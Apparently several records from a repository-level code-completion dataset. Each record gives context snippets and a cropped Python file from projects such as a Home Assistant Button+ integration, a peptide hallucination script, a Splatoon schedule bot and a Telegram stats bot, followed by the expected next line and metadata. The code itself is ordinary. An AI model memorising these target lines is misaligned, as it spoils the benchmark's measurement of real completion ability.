"snippet": "class LocalApiClient:\n \"\"\" Client to talk to Button+ local devices \"\"\"\n\n def __init__(self, ip_address, session) -> None:\n self._base = f\"http://{ip_address}\"\n self._session = session\n\n _LOGGER.debug(f\"Initialize Button+ local API client\")\n\n async def fetch_config(self):\n url = f\"{self._base}/config\"\n _LOGGER.debug(f\"fetch_config {url}\")\n async with self._session.get(url) as response:\n return await response.text()\n\n async def push_config(self, config):\n url = f\"{self._base}/configsave\"\n _LOGGER.debug(f\"push_config {url}\")\n async with self._session.post(url, data=config.to_json()) as response:\n return await response.text()"
},
{
"identifier": "DeviceConfiguration",
"path": "custom_components/button_plus/button_plus_api/model.py",
"snippet": "class DeviceConfiguration:\n def __init__(self, info: Info, core: Core, mqtt_buttons: List[MqttButton], mqtt_displays: List[MqttDisplay],\n mqtt_brokers: List[MqttBroker], mqtt_sensors: List[MqttSensor]):\n self.info = info\n self.core = core\n self.mqtt_buttons = mqtt_buttons\n self.mqtt_displays = mqtt_displays\n self.mqtt_brokers = mqtt_brokers\n self.mqtt_sensors = mqtt_sensors\n\n @staticmethod\n def from_json(json_data: str) -> 'DeviceConfiguration':\n data = json.loads(json_data)\n return DeviceConfiguration(\n info=Info.from_dict(data['info']),\n core=Core.from_dict(data['core']),\n mqtt_buttons=[MqttButton.from_dict(button) for button in data['mqttbuttons']],\n mqtt_displays=[MqttDisplay.from_dict(display) for display in data['mqttdisplays']],\n mqtt_brokers=[MqttBroker.from_dict(broker) for broker in data['mqttbrokers']],\n mqtt_sensors=[MqttSensor.from_dict(sensor) for sensor in data['mqttsensors']],\n )\n\n def to_json(self) -> str:\n def serialize(obj):\n if hasattr(obj, '__dict__'):\n d = obj.__dict__.copy()\n\n # Convert the root keys\n if isinstance(obj, DeviceConfiguration):\n d['mqttbuttons'] = [serialize(button) for button in d.pop('mqtt_buttons')]\n d['mqttdisplays'] = [serialize(display) for display in d.pop('mqtt_displays')]\n d['mqttbrokers'] = [serialize(broker) for broker in d.pop('mqtt_brokers')]\n d['mqttsensors'] = [serialize(sensor) for sensor in d.pop('mqtt_sensors')]\n\n if isinstance(obj, Info):\n d['id'] = d.pop('device_id')\n d['ipaddress'] = d.pop('ip_address')\n d['largedisplay'] = d.pop('large_display')\n\n elif isinstance(obj, Connector):\n d['id'] = d.pop('connector_id')\n d['type'] = d.pop('connector_type')\n\n elif isinstance(obj, Sensor):\n d['sensorid'] = d.pop('sensor_id')\n\n elif isinstance(obj, Core):\n d['autobackup'] = d.pop('auto_backup')\n d['brightnesslargedisplay'] = d.pop('brightness_large_display')\n d['brightnessminidisplay'] = d.pop('brightness_mini_display')\n d['ledcolorfront'] = d.pop('led_color_front')\n d['ledcolorwall'] = d.pop('led_color_wall')\n\n # Custom mappings for MqttButton class\n elif isinstance(obj, MqttButton):\n d['id'] = d.pop('button_id')\n d['toplabel'] = d.pop('top_label')\n d['ledcolorfront'] = d.pop('led_color_front')\n d['ledcolorwall'] = d.pop('led_color_wall')\n d['longdelay'] = d.pop('long_delay')\n d['longrepeat'] = d.pop('long_repeat')\n\n elif isinstance(obj, Topic):\n d['brokerid'] = d.pop('broker_id')\n d['eventtype'] = d.pop('event_type')\n\n elif isinstance(obj, MqttDisplay):\n d['fontsize'] = d.pop('font_size')\n d['topics'] = [serialize(topic) for topic in d['topics']]\n\n elif isinstance(obj, MqttBroker):\n d['brokerid'] = d.pop('broker_id')\n d['wsport'] = d.pop('ws_port')\n\n elif isinstance(obj, MqttSensor):\n d['sensorid'] = d.pop('sensor_id')\n d['topic'] = serialize(d['topic'])\n\n # Filter out None values\n return {k: v for k, v in d.items() if v is not None}\n else:\n return str(obj)\n\n return json.dumps(self, default=serialize, indent=4)"
},
{
"identifier": "DOMAIN",
"path": "custom_components/button_plus/const.py",
"snippet": "DOMAIN = \"button_plus\""
},
{
"identifier": "MANUFACTURER",
"path": "custom_components/button_plus/const.py",
"snippet": "MANUFACTURER = \"Button+\""
}
] | import logging
from homeassistant.config_entries import ConfigEntry
from homeassistant.helpers import device_registry as dr
from .button_plus_api.local_api_client import LocalApiClient
from .button_plus_api.model import DeviceConfiguration
from homeassistant.core import HomeAssistant
from .const import DOMAIN, MANUFACTURER
from homeassistant.helpers import aiohttp_client | 1,506 | """Button+ connects several devices."""
from __future__ import annotations
_LOGGER: logging.Logger = logging.getLogger(__package__)
class ButtonPlusHub:
"""hub for Button+."""
def __init__(self, hass: HomeAssistant, config: DeviceConfiguration, entry: ConfigEntry) -> None:
_LOGGER.debug(f"New hub with config {config.core}")
self._hass = hass
self.config = config
self._name = config.core.name
self._id = self.config.info.device_id
self._client = LocalApiClient(config.info.ip_address, aiohttp_client.async_get_clientsession(hass))
self.online = True
self.button_entities = {}
self.label_entities = {}
self.top_label_entities = {}
device_registry = dr.async_get(hass)
device_registry.async_get_or_create(
configuration_url=f"http://{self.config.info.ip_address}/",
config_entry_id=entry.entry_id,
connections={(dr.CONNECTION_NETWORK_MAC, self.config.info.mac)},
| """Button+ connects several devices."""
from __future__ import annotations
_LOGGER: logging.Logger = logging.getLogger(__package__)
class ButtonPlusHub:
"""hub for Button+."""
def __init__(self, hass: HomeAssistant, config: DeviceConfiguration, entry: ConfigEntry) -> None:
_LOGGER.debug(f"New hub with config {config.core}")
self._hass = hass
self.config = config
self._name = config.core.name
self._id = self.config.info.device_id
self._client = LocalApiClient(config.info.ip_address, aiohttp_client.async_get_clientsession(hass))
self.online = True
self.button_entities = {}
self.label_entities = {}
self.top_label_entities = {}
device_registry = dr.async_get(hass)
device_registry.async_get_or_create(
configuration_url=f"http://{self.config.info.ip_address}/",
config_entry_id=entry.entry_id,
connections={(dr.CONNECTION_NETWORK_MAC, self.config.info.mac)}, | identifiers={(DOMAIN, self.config.info.device_id)}, | 2 | 2023-12-18 15:14:21+00:00 | 2k |
RosettaCommons/AF2_peptide_hallucination | run.py | [
{
"identifier": "select_positions",
"path": "util/util.py",
"snippet": "def select_positions(n_mutations, boundcomplex, select_positions, select_position_params):\n '''\n Select mutable positions in the binder based on a specific method.\n Returns a dictionary of binder with associated array indicating mutable positions.\n '''\n\n mutable_positions = {}\n\n if select_positions == 'random':\n # Choose positions randomly.\n mutable_positions['binder'] = np.random.choice(range(len(boundcomplex.current_binder_seq)), size=n_mutations, replace=False)\n\n elif select_positions == 'plddt':\n # Choose positions based on lowest plddt in binder sequence.\n # First/last three positions of binder are choice frequency adjusted to avoid picking N/C term every time (they tend to score much lower).\n\n mutate_plddt_quantile = 0.5 # default worst pLDDT quantile to mutate.\n \n # Get plddts from sequence object (binder) \n plddts = boundcomplex.current_prediction_results[\"plddt\"]\n \n # Take just binder segment\n plddts = plddts[:boundcomplex.binder_length,]\n \n # Weights associated with each position in the binder.\n # to account for termini systematically scoring worse in pLDDT.\n weights = np.array([0.25, 0.5, 0.75] + [1] * (boundcomplex.binder_length - 6) + [0.75, 0.5, 0.25])\n\n n_potential = round(boundcomplex.binder_length * mutate_plddt_quantile)\n potential_sites = np.argsort(plddts)[:n_potential]\n\n # Select mutable sites\n sub_w = weights[potential_sites]\n sub_w = [w/np.sum(sub_w) for w in sub_w]\n sites = np.random.choice(potential_sites, size=n_mutations, replace=False, p=sub_w)\n\n mutable_positions['binder'] = sites\n\n return mutable_positions"
},
{
"identifier": "util",
"path": "util/util.py",
"snippet": "def select_positions(n_mutations, boundcomplex, select_positions, select_position_params):\ndef get_aa_freq(AA_freq: dict, exclude_AA: str):\ndef initialize_MCMC(conf):\ndef initialize_score_file(conf) -> None:\ndef append_score_file(i, accepted, T, n_mutations, try_loss, try_scores, conf) -> None:\ndef accept_or_reject(boundcomplex, T, step):\ndef write_outputs(boundcomplex, conf, i) -> None:\ndef relabel_chains(pdb_lines):\n M = np.linspace(int(Mi), int(Mf), conf.hallucination.steps) # stepped linear decay of the mutation rate"
},
{
"identifier": "compute_loss",
"path": "util/loss.py",
"snippet": "def compute_loss(conf, boundcomplex):\n \"\"\"\n Computes losses as defined by the config file\n \"\"\"\n losses=OrderedDict()\n for loss_name in conf:\n loss_function = globals().get(loss_name, None)\n if loss_function is not None and callable(loss_function):\n losses[loss_name] = loss_function(boundcomplex)\n else:\n raise ValueError(f\"Loss function {loss_name} not found\")\n total_loss=combine_loss(losses, conf)\n return total_loss, losses"
}
] | import os
import sys
import numpy as np
import hydra
import copy
from submodules.oligomer_hallucination.oligomer_hallucination import Protomers, Oligomer
from submodules.oligomer_hallucination.oligomer_hallucination import AA_FREQ
from submodules.oligomer_hallucination.modules.af2_net import setup_models, predict_structure
from submodules.oligomer_hallucination.modules.mutations import mutate
from util.util import select_positions
from util import util
from util.loss import compute_loss
from omegaconf import DictConfig, OmegaConf
from hydra.core.hydra_config import HydraConfig | 1,507 |
class BoundComplex(Protomers, Oligomer):
'''
Class for keeping track of binder sequence and complex predictions
during binder hallucination.
'''
def __init__(self, target_sequence: str, name, length=70, aa_freq={}, binder_sequence=None):
"""
target_sequence: amino acid sequence of target peptide (to bind)
length: length of binder peptide
binder_sequence: Optional, starting amino acid sequence of the binder
aa_freq: dictonary containing the frequencies of each aa
"""
self.target_seq = target_sequence.upper()
assert len(self.target_seq) > 0, "Target sequence must be provided"
self.length = int(length)
self.aa_freq = aa_freq
# Get initial binder sequence
if binder_sequence:
assert self.length > 0, "Binder length must be greater than 0"
self.init_binder_seq = binder_sequence.upper()
else:
self.init_binder_seq = ''.join(np.random.choice(list(aa_freq.keys()), size = length, p=list(aa_freq.values())))
self.binder_length = len(self.init_binder_seq)
self.target_length = len(self.target_seq)
self.chain_Ls = [self.binder_length, self.target_length]
self.init_bound_seq = self.init_binder_seq + self.target_seq
self.bound_length = len(self.init_bound_seq)
# Initialize current and try sequences,
self.current_binder_seq = self.init_binder_seq
self.try_binder_seq = self.init_binder_seq
self.current_bound_seq = self.init_bound_seq
self.try_seq = self.init_bound_seq
self.name=name
def init_scores(self, scores):
'''Initalise scores'''
self.init_scores = scores
self.current_scores = scores
self.try_scores = scores
def update_scores(self):
'''Update current scores to try scores. '''
self.current_scores = self.try_scores
def assign_scores(self, scores):
'''Assign try scores. '''
self.try_scores = scores
def update_scores(self):
'''Update current scores to try scores.'''
self.current_scores = copy.deepcopy(self.try_scores)
@hydra.main(version_base=None, config_path='config', config_name='base')
def main(conf: HydraConfig) -> None:
"""
Main function for running peptide binder hallucination.
"""
input_conf=conf.input
output_conf=conf.output
loss_conf=conf.loss
model_conf=conf.model
hallucination_conf=conf.hallucination
os.makedirs(output_conf.out_dir, exist_ok=True)
if output_conf.cautious and os.path.exists(f'{output_conf.out_dir}/{output_conf.out_prefix}_step_00000.pdb'):
sys.exit(f'Specified output already exists. Exiting. To overwrite, provide output.cautious=False')
|
class BoundComplex(Protomers, Oligomer):
'''
Class for keeping track of binder sequence and complex predictions
during binder hallucination.
'''
def __init__(self, target_sequence: str, name, length=70, aa_freq={}, binder_sequence=None):
"""
target_sequence: amino acid sequence of target peptide (to bind)
length: length of binder peptide
binder_sequence: Optional, starting amino acid sequence of the binder
aa_freq: dictonary containing the frequencies of each aa
"""
self.target_seq = target_sequence.upper()
assert len(self.target_seq) > 0, "Target sequence must be provided"
self.length = int(length)
self.aa_freq = aa_freq
# Get initial binder sequence
if binder_sequence:
assert self.length > 0, "Binder length must be greater than 0"
self.init_binder_seq = binder_sequence.upper()
else:
self.init_binder_seq = ''.join(np.random.choice(list(aa_freq.keys()), size = length, p=list(aa_freq.values())))
self.binder_length = len(self.init_binder_seq)
self.target_length = len(self.target_seq)
self.chain_Ls = [self.binder_length, self.target_length]
self.init_bound_seq = self.init_binder_seq + self.target_seq
self.bound_length = len(self.init_bound_seq)
# Initialize current and try sequences,
self.current_binder_seq = self.init_binder_seq
self.try_binder_seq = self.init_binder_seq
self.current_bound_seq = self.init_bound_seq
self.try_seq = self.init_bound_seq
self.name=name
def init_scores(self, scores):
'''Initalise scores'''
self.init_scores = scores
self.current_scores = scores
self.try_scores = scores
def update_scores(self):
'''Update current scores to try scores. '''
self.current_scores = self.try_scores
def assign_scores(self, scores):
'''Assign try scores. '''
self.try_scores = scores
def update_scores(self):
'''Update current scores to try scores.'''
self.current_scores = copy.deepcopy(self.try_scores)
@hydra.main(version_base=None, config_path='config', config_name='base')
def main(conf: HydraConfig) -> None:
"""
Main function for running peptide binder hallucination.
"""
input_conf=conf.input
output_conf=conf.output
loss_conf=conf.loss
model_conf=conf.model
hallucination_conf=conf.hallucination
os.makedirs(output_conf.out_dir, exist_ok=True)
if output_conf.cautious and os.path.exists(f'{output_conf.out_dir}/{output_conf.out_prefix}_step_00000.pdb'):
sys.exit(f'Specified output already exists. Exiting. To overwrite, provide output.cautious=False')
| AA_freq=util.get_aa_freq(AA_FREQ, hallucination_conf.exclude_AA) | 1 | 2023-12-21 12:07:25+00:00 | 2k |
Cypas/splatoon3-schedule | nonebot_plugin_splatoon3_schedule/utils/utils.py | [
{
"identifier": "TimeUtil",
"path": "nonebot_plugin_splatoon3_schedule/utils/dataClass.py",
"snippet": "class TimeUtil(object):\n @classmethod\n def parse_timezone(cls, timezone):\n \"\"\"\n 解析时区表示\n :param timezone: str eg: +8\n :return: dict{symbol, offset}\n \"\"\"\n result = re.match(r\"(?P<symbol>[+-])(?P<offset>\\d+)\", timezone)\n symbol = result.groupdict()[\"symbol\"]\n offset = int(result.groupdict()[\"offset\"])\n\n return {\"symbol\": symbol, \"offset\": offset}\n\n @classmethod\n def convert_timezone(cls, dt, timezone=\"+0\") -> datetime.datetime:\n \"\"\"默认是utc时间,需要提供时区\"\"\"\n result = cls.parse_timezone(timezone)\n symbol = result[\"symbol\"]\n\n offset = result[\"offset\"]\n\n if symbol == \"+\":\n return dt + timedelta(hours=offset)\n elif symbol == \"-\":\n return dt - timedelta(hours=offset)\n else:\n raise Exception(\"dont parse timezone format\")"
},
{
"identifier": "plugin_config",
"path": "nonebot_plugin_splatoon3_schedule/config.py",
"snippet": "class Config(BaseModel):"
}
] | import datetime
import cfscrape
import httpx
from httpx import Response
from .dataClass import TimeUtil
from ..config import plugin_config | 1,412 | "Ranked Challenge": (227, 68, 17),
"Ranked Open": (24, 200, 26),
"X Schedule": (14, 205, 147),
"打工": (14, 203, 146),
"活动": (223, 42, 119),
"祭典": (103, 103, 114),
"祭典时间-金黄": (234, 255, 61),
"上-武器卡片-黄": (234, 255, 61),
"下-武器卡片-蓝": (96, 58, 255),
"上-武器卡片": (255, 148, 157),
"下-武器卡片": (124, 217, 127),
"祭典结算项目卡片": (63, 63, 70, 70),
}
def cf_http_get(url: str):
"""cf get"""
# 实例化一个create_scraper对象
scraper = cfscrape.create_scraper()
# 请求报错,可以加上时延
# scraper = cfscrape.create_scraper(delay = 6)
if proxy_address:
cf_proxies = {
"http": "http://{}".format(proxy_address),
"https": "http://{}".format(proxy_address),
}
# 获取网页内容 代理访问
res = scraper.get(url, proxies=cf_proxies)
else:
# 获取网页内容
res = scraper.get(url)
return res
async def async_http_get(url: str) -> Response:
"""async http_get"""
async with httpx.AsyncClient(proxies=proxies) as client:
response = await client.get(url, timeout=HTTP_TIME_OUT)
return response
def http_get(url: str) -> Response:
"""http_get"""
response = httpx.get(url, proxies=proxies, timeout=HTTP_TIME_OUT)
return response
def multiple_replace(text, _dict):
"""批量替换文本"""
for key in _dict:
text = text.replace(key, _dict[key])
return text
def get_expire_time() -> str:
"""计算过期时间 字符串 精确度为 ymdh"""
# 计算过期时间
time_now = get_time_now_china()
time_now_h = time_now.hour
# 计算过期时间字符串
# 判断当前小时是奇数还是偶数
expire_time: datetime
if (time_now_h % 2) == 0:
# 偶数
expire_time = time_now + datetime.timedelta(hours=2)
else:
expire_time = time_now + datetime.timedelta(hours=1)
expire_time_str = expire_time.strftime(time_format_ymdh).strip()
return expire_time_str
def time_converter(time_str) -> datetime:
"""时间转换 年-月-日 时:分:秒"""
# convert time to UTC+8
dt = datetime.datetime.strptime(time_str, "%Y-%m-%dT%H:%M:%SZ")
dt += datetime.timedelta(hours=8)
return dt
def time_converter_yd(time_str):
"""时间转换 月-日"""
dt = time_converter(time_str)
return datetime.datetime.strftime(dt, "%m.%d")
def time_converter_hm(time_str):
"""时间转换 时:分"""
dt = time_converter(time_str)
return datetime.datetime.strftime(dt, "%H:%M")
def time_converter_mdhm(time_str):
"""时间转换 月-日 时:分"""
dt = time_converter(time_str)
return datetime.datetime.strftime(dt, "%m-%d %H:%M")
def time_converter_weekday(time_str):
"""时间转换 周几,如周一"""
dt = time_converter(time_str)
weekday = dt.weekday()
return weekday
def get_time_ymd():
"""获取年月日"""
dt = get_time_now_china().strftime("%Y-%m-%d")
return dt
def get_time_y() -> int:
"""获取年"""
year = get_time_now_china().year
return year
def get_time_now_china() -> datetime.datetime:
"""获取中国所在东八区时间"""
# 获取utc时间,然后转东8区时间
utc_now = datetime.datetime.utcnow()
|
time_format_ymdh = "%Y-%m-%dT%H"
HTTP_TIME_OUT = 5.0 # 请求超时,秒
proxy_address = plugin_config.splatoon3_proxy_address
if proxy_address:
proxies = "http://{}".format(proxy_address)
else:
proxies = None
# 背景 rgb颜色
dict_bg_rgb = {
"Turf War": (24, 200, 26),
"Ranked Challenge": (227, 68, 17),
"Ranked Open": (24, 200, 26),
"X Schedule": (14, 205, 147),
"打工": (14, 203, 146),
"活动": (223, 42, 119),
"祭典": (103, 103, 114),
"祭典时间-金黄": (234, 255, 61),
"上-武器卡片-黄": (234, 255, 61),
"下-武器卡片-蓝": (96, 58, 255),
"上-武器卡片": (255, 148, 157),
"下-武器卡片": (124, 217, 127),
"祭典结算项目卡片": (63, 63, 70, 70),
}
def cf_http_get(url: str):
"""cf get"""
# 实例化一个create_scraper对象
scraper = cfscrape.create_scraper()
# 请求报错,可以加上时延
# scraper = cfscrape.create_scraper(delay = 6)
if proxy_address:
cf_proxies = {
"http": "http://{}".format(proxy_address),
"https": "http://{}".format(proxy_address),
}
# 获取网页内容 代理访问
res = scraper.get(url, proxies=cf_proxies)
else:
# 获取网页内容
res = scraper.get(url)
return res
async def async_http_get(url: str) -> Response:
"""async http_get"""
async with httpx.AsyncClient(proxies=proxies) as client:
response = await client.get(url, timeout=HTTP_TIME_OUT)
return response
def http_get(url: str) -> Response:
"""http_get"""
response = httpx.get(url, proxies=proxies, timeout=HTTP_TIME_OUT)
return response
def multiple_replace(text, _dict):
"""批量替换文本"""
for key in _dict:
text = text.replace(key, _dict[key])
return text
def get_expire_time() -> str:
"""计算过期时间 字符串 精确度为 ymdh"""
# 计算过期时间
time_now = get_time_now_china()
time_now_h = time_now.hour
# 计算过期时间字符串
# 判断当前小时是奇数还是偶数
expire_time: datetime
if (time_now_h % 2) == 0:
# 偶数
expire_time = time_now + datetime.timedelta(hours=2)
else:
expire_time = time_now + datetime.timedelta(hours=1)
expire_time_str = expire_time.strftime(time_format_ymdh).strip()
return expire_time_str
def time_converter(time_str) -> datetime:
"""时间转换 年-月-日 时:分:秒"""
# convert time to UTC+8
dt = datetime.datetime.strptime(time_str, "%Y-%m-%dT%H:%M:%SZ")
dt += datetime.timedelta(hours=8)
return dt
def time_converter_yd(time_str):
"""时间转换 月-日"""
dt = time_converter(time_str)
return datetime.datetime.strftime(dt, "%m.%d")
def time_converter_hm(time_str):
"""时间转换 时:分"""
dt = time_converter(time_str)
return datetime.datetime.strftime(dt, "%H:%M")
def time_converter_mdhm(time_str):
"""时间转换 月-日 时:分"""
dt = time_converter(time_str)
return datetime.datetime.strftime(dt, "%m-%d %H:%M")
def time_converter_weekday(time_str):
"""时间转换 周几,如周一"""
dt = time_converter(time_str)
weekday = dt.weekday()
return weekday
def get_time_ymd():
"""获取年月日"""
dt = get_time_now_china().strftime("%Y-%m-%d")
return dt
def get_time_y() -> int:
"""获取年"""
year = get_time_now_china().year
return year
def get_time_now_china() -> datetime.datetime:
"""获取中国所在东八区时间"""
# 获取utc时间,然后转东8区时间
utc_now = datetime.datetime.utcnow() | convert_now = TimeUtil.convert_timezone(utc_now, "+8") | 0 | 2023-12-17 07:49:26+00:00 | 2k |
Sam-Izdat/tinycio | src/tinycio/fsio/imagefile.py | [
{
"identifier": "GraphicsFormat",
"path": "src/tinycio/fsio/format.py",
"snippet": "class GraphicsFormat(IntEnum):\n \"\"\"\n The graphics format of an image file to be saved or loaded. For a list of available options, see :ref:`ref_graphics_formats`.\n \"\"\"\n UNKNOWN = 1<<0\n UINT8 = 1<<1\n UINT16 = 1<<2\n UINT32 = 1<<3\n SFLOAT16 = 1<<4\n SFLOAT32 = 1<<5\n UNORM8 = 1<<6\n UNORM16 = 1<<7\n UNORM32 = 1<<8\n\n # Lump together any integer-type values\n I8 = UINT8 | UNORM8\n I16 = UINT16 | UNORM16\n I32 = UINT32 | UNORM32\n\n UNORM = UNORM8 | UNORM16 | UNORM32\n\n READABLE = UINT8 | UINT16 | UINT32 | UNORM8 | UNORM16 | UNORM32 | SFLOAT16 | SFLOAT32\n\n WRITABLE_PNG = UINT8 | UINT16 | UNORM8 | UNORM16\n WRITABLE_TIF = SFLOAT16 | SFLOAT32\n WRITABLE_EXR = SFLOAT16 | SFLOAT32"
},
{
"identifier": "ImageFileFormat",
"path": "src/tinycio/fsio/format.py",
"snippet": "class ImageFileFormat(IntEnum):\n # TODO: Needs to be expanded after investigating iio support\n # NOTE: Not in user API right now, as it doesn't need to be\n UNKNOWN = 1<<0\n PNG = 1<<1\n JPG = 1<<2\n EXR = 1<<3\n TIFF = 1<<4\n WEBP = 1<<5\n\n # This is annoying, so let's just...\n TIF = TIFF\n JPEG = JPG\n\n # Supported bit depth\n UINT8 = PNG | JPG | WEBP\n UINT16 = PNG\n SFLOAT16 = EXR | TIFF\n SFLOAT32 = EXR | TIFF"
}
] | import torch
import numpy as np
import typing
import os
import imageio.v3 as iio
from .format import GraphicsFormat, ImageFileFormat | 699 |
def _infer_image_file_format(ext:str) -> ImageFileFormat:
ext = ext.strip().lower()
if ext == '.png': return ImageFileFormat.PNG
elif ext == '.jpg': return ImageFileFormat.JPG
elif ext == '.jpeg': return ImageFileFormat.JPG
elif ext == '.exr': return ImageFileFormat.EXR
elif ext == '.tif': return ImageFileFormat.TIFF
elif ext == '.tiff': return ImageFileFormat.TIFF
elif ext == '.webp': return ImageFileFormat.WEBP
else: return ImageFileFormat.UNKNOWN
|
def _infer_image_file_format(ext:str) -> ImageFileFormat:
ext = ext.strip().lower()
if ext == '.png': return ImageFileFormat.PNG
elif ext == '.jpg': return ImageFileFormat.JPG
elif ext == '.jpeg': return ImageFileFormat.JPG
elif ext == '.exr': return ImageFileFormat.EXR
elif ext == '.tif': return ImageFileFormat.TIFF
elif ext == '.tiff': return ImageFileFormat.TIFF
elif ext == '.webp': return ImageFileFormat.WEBP
else: return ImageFileFormat.UNKNOWN
| def load_image(fp:str, graphics_format:GraphicsFormat=GraphicsFormat.UNKNOWN) -> torch.Tensor: | 0 | 2023-12-15 15:39:08+00:00 | 2k |
Dank-del/stats-bot | stats_bot/handlers/plot.py | [
{
"identifier": "Attachment",
"path": "stats_bot/db/models.py",
"snippet": "class Attachment(SQLModel, table=True):\n id: Optional[int] = Field(default=None, primary_key=True)\n user_id: int = Field(foreign_key=\"user.id\")\n group_id: int = Field(foreign_key=\"group.id\")\n message_id: int = Field()\n media_type: str\n timestamp: datetime = Field(default=datetime.utcnow)"
},
{
"identifier": "Message",
"path": "stats_bot/db/models.py",
"snippet": "class Message(SQLModel, table=True):\n id: Optional[int] = Field(default=None, primary_key=True)\n user_id: int = Field(foreign_key=\"user.id\")\n group_id: int = Field(foreign_key=\"group.id\")\n text: str\n timestamp: datetime = Field(default=datetime.utcnow)"
},
{
"identifier": "User",
"path": "stats_bot/db/models.py",
"snippet": "class User(SQLModel, table=True):\n id: int = Field(primary_key=True)\n username: Optional[str] = Field(nullable=True)\n first_name: str\n last_name: Optional[str] = Field(nullable=True)"
},
{
"identifier": "engine",
"path": "stats_bot/db/client.py",
"snippet": "def load_tables():"
},
{
"identifier": "admin",
"path": "stats_bot/decorators/admin.py",
"snippet": "def admin(func):\n \"\"\"\n Decorator that checks if the user is an admin before executing the wrapped function.\n\n Args:\n func (callable): The function to be wrapped.\n\n Returns:\n callable: The wrapped function.\n\n \"\"\"\n async def wrapper(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n member = await update.effective_chat.get_member(update.effective_user.id)\n if (\n member.status is not ChatMemberStatus.ADMINISTRATOR\n and member.status is not ChatMemberStatus.OWNER\n ):\n await update.message.reply_text(\"You are not an admin\")\n return\n return await func(update, context)\n\n return wrapper"
}
] | import pandas as pd
import matplotlib.pyplot as plt
import io
from sqlmodel import Session, select
from telegram import Update
from telegram.ext import (
ContextTypes,
)
from stats_bot.db.models import Attachment, Message, User
from stats_bot.db.client import engine
from stats_bot.decorators.admin import admin | 1,204 |
@admin
async def plot_table(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
"""
Generates a table of top 10 users by number of messages and average message length,
and plots a bar chart to visualize the data.
Args:
update (Update): The update object containing information about the incoming message.
context (ContextTypes.DEFAULT_TYPE): The context object containing bot-related information.
Returns:
None
"""
msg = await update.effective_message.reply_text("Generating table...")
data = []
# fetch this data from database
with Session(engine) as session:
# users = session.exec(select(User)).all()
messages = session.exec(
select(Message).where(Message.group_id == update.effective_chat.id)
).all()
# make a list of users, messages of whom are in the messages variable
users = []
for message in messages:
if message.user_id not in users:
users.append(message.user_id)
# print(users)
for user in users:
usr = session.exec(select(User).where(User.id == user)).first()
msgs = session.exec(
select(Message.text).where(Message.user_id == usr.id)
).all()
data.append((usr.username or str(usr.id), msgs))
# Convert data to a pandas DataFrame
df = pd.DataFrame(data, columns=["user_id", "messages"])
print(df)
df["num_messages"] = df["messages"].apply(len)
# Calculate average message length per user
df["avg_message_length"] = df["messages"].apply(
lambda x: sum(len(message) for message in x) / len(x)
)
# Sort users by number of messages and average message length
df = df.sort_values(by=["num_messages", "avg_message_length"], ascending=False)
# Plot top 10 users
top_10_users = df.head(10)
plt.figure(figsize=(10, 6))
plt.bar(
top_10_users["user_id"],
top_10_users["num_messages"],
color="blue",
alpha=0.6,
label="Number of Messages",
)
plt.xlabel("User ID")
plt.ylabel("Number of Messages")
plt.title(
f"Top 10 Users in {update.effective_chat.title} by Number of Messages and Average Message Length"
)
plt.legend()
buf = io.BytesIO()
plt.savefig(buf, format="png")
buf.seek(0)
await msg.delete()
await context.bot.send_photo(
chat_id=update.effective_chat.id,
photo=buf,
reply_to_message_id=msg.reply_to_message.message_id,
)
@admin
async def attachment_stats(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
"""
Generates a table of top 10 users by number of attachments sent,
and plots a bar chart to visualize the data.
Args:
update (Update): The update object containing information about the incoming message.
context (CallbackContext): The context object containing bot-related information.
Returns:
None
"""
msg = await update.effective_message.reply_text("Generating attachment stats...")
data = []
# fetch this data from database
with Session(engine) as session:
attachments = session.exec(
|
@admin
async def plot_table(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
"""
Generates a table of top 10 users by number of messages and average message length,
and plots a bar chart to visualize the data.
Args:
update (Update): The update object containing information about the incoming message.
context (ContextTypes.DEFAULT_TYPE): The context object containing bot-related information.
Returns:
None
"""
msg = await update.effective_message.reply_text("Generating table...")
data = []
# fetch this data from database
with Session(engine) as session:
# users = session.exec(select(User)).all()
messages = session.exec(
select(Message).where(Message.group_id == update.effective_chat.id)
).all()
# make a list of users, messages of whom are in the messages variable
users = []
for message in messages:
if message.user_id not in users:
users.append(message.user_id)
# print(users)
for user in users:
usr = session.exec(select(User).where(User.id == user)).first()
msgs = session.exec(
select(Message.text).where(Message.user_id == usr.id)
).all()
data.append((usr.username or str(usr.id), msgs))
# Convert data to a pandas DataFrame
df = pd.DataFrame(data, columns=["user_id", "messages"])
print(df)
df["num_messages"] = df["messages"].apply(len)
# Calculate average message length per user
df["avg_message_length"] = df["messages"].apply(
lambda x: sum(len(message) for message in x) / len(x)
)
# Sort users by number of messages and average message length
df = df.sort_values(by=["num_messages", "avg_message_length"], ascending=False)
# Plot top 10 users
top_10_users = df.head(10)
plt.figure(figsize=(10, 6))
plt.bar(
top_10_users["user_id"],
top_10_users["num_messages"],
color="blue",
alpha=0.6,
label="Number of Messages",
)
plt.xlabel("User ID")
plt.ylabel("Number of Messages")
plt.title(
f"Top 10 Users in {update.effective_chat.title} by Number of Messages and Average Message Length"
)
plt.legend()
buf = io.BytesIO()
plt.savefig(buf, format="png")
buf.seek(0)
await msg.delete()
await context.bot.send_photo(
chat_id=update.effective_chat.id,
photo=buf,
reply_to_message_id=msg.reply_to_message.message_id,
)
@admin
async def attachment_stats(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
"""
Generates a table of top 10 users by number of attachments sent,
and plots a bar chart to visualize the data.
Args:
update (Update): The update object containing information about the incoming message.
context (CallbackContext): The context object containing bot-related information.
Returns:
None
"""
msg = await update.effective_message.reply_text("Generating attachment stats...")
data = []
# fetch this data from database
with Session(engine) as session:
attachments = session.exec( | select(Attachment).where(Attachment.group_id == update.effective_chat.id) | 0 | 2023-12-18 03:05:36+00:00 | 2k |
EzyGang/py-cachify | py_cachify/backend/lib.py | [
{
"identifier": "AsyncWrapper",
"path": "py_cachify/backend/clients.py",
"snippet": "class AsyncWrapper:\n def __init__(self, cache: MemoryCache) -> None:\n self._cache = cache\n\n async def get(self, name: str, default: Any = None) -> Any:\n return self._cache.get(name=name, default=default)\n\n async def delete(self, *names: str) -> Any:\n self._cache.delete(*names)\n\n async def set(self, name: str, value: Any, ex: Union[int, None] = None) -> Any:\n self._cache.set(name=name, value=value, ex=ex)"
},
{
"identifier": "MemoryCache",
"path": "py_cachify/backend/clients.py",
